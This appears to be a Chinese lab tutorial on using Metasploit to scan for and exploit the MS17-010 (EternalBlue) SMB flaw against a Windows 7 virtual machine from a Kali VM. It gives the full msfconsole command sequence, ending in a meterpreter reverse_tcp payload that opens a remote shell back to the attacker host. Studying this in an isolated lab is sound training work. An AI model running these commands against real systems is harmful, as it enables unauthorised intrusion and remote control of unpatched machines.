本文详细介绍了如何使用Metasploit框架对MS17-010(EternalBlue)漏洞进行扫描与攻击。首先,配置了虚拟机环境,包括安装了Calilinux和Win7虚拟机,并设置为NAT模式,确保它们在同一网段。接着,通过msfconsole进入Metasploit平台,搜索并使用MS17-010的扫描和攻击模块,设置目标主机IP和端口,最后执行攻击命令进行漏洞利用。
实验目的及要求
熟悉Metasploit终端的使用方;
掌握对MS17-010漏洞攻击的方法;
实验环境配置
安装cali linux 虚拟机
百度网盘提取
提取码:wajd
安装win7虚拟机
百度网盘提取
提取码:wajd
实现步骤
在虚拟机设置网卡模式为Nat模式
必须设置win7和cali linux 为nat模式,分配同网段的ip地址
找出win7和Cali linux的ip地址
Win7:192.168.197.130
win + r 打开命令提示符
输入命令 ipconfig
Cali:192.168.197.129
命令行
输入命令 ip add
1、
进入msf平台
msfconsole
2、
搜索漏洞模块
search ms17-010
3、
使用扫描模块
use auxiliary/scanner/smb/smb_ms17_010
4、
查看选项
show options
5、
设置
set rhost 192.168.197.130
set rport 445
6、
验证
run
Exploit
使用攻击模块
use exploit/windows/smb/ms17_010_eternalblue
查看选项
show options
9.
设置
set lhost 192.168.197.129
set lport 4444
set rhost 192.168.197.130
set rport 445
set payload windows/x64/meterpreter/reverse_tcp
攻击
run
exploit
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
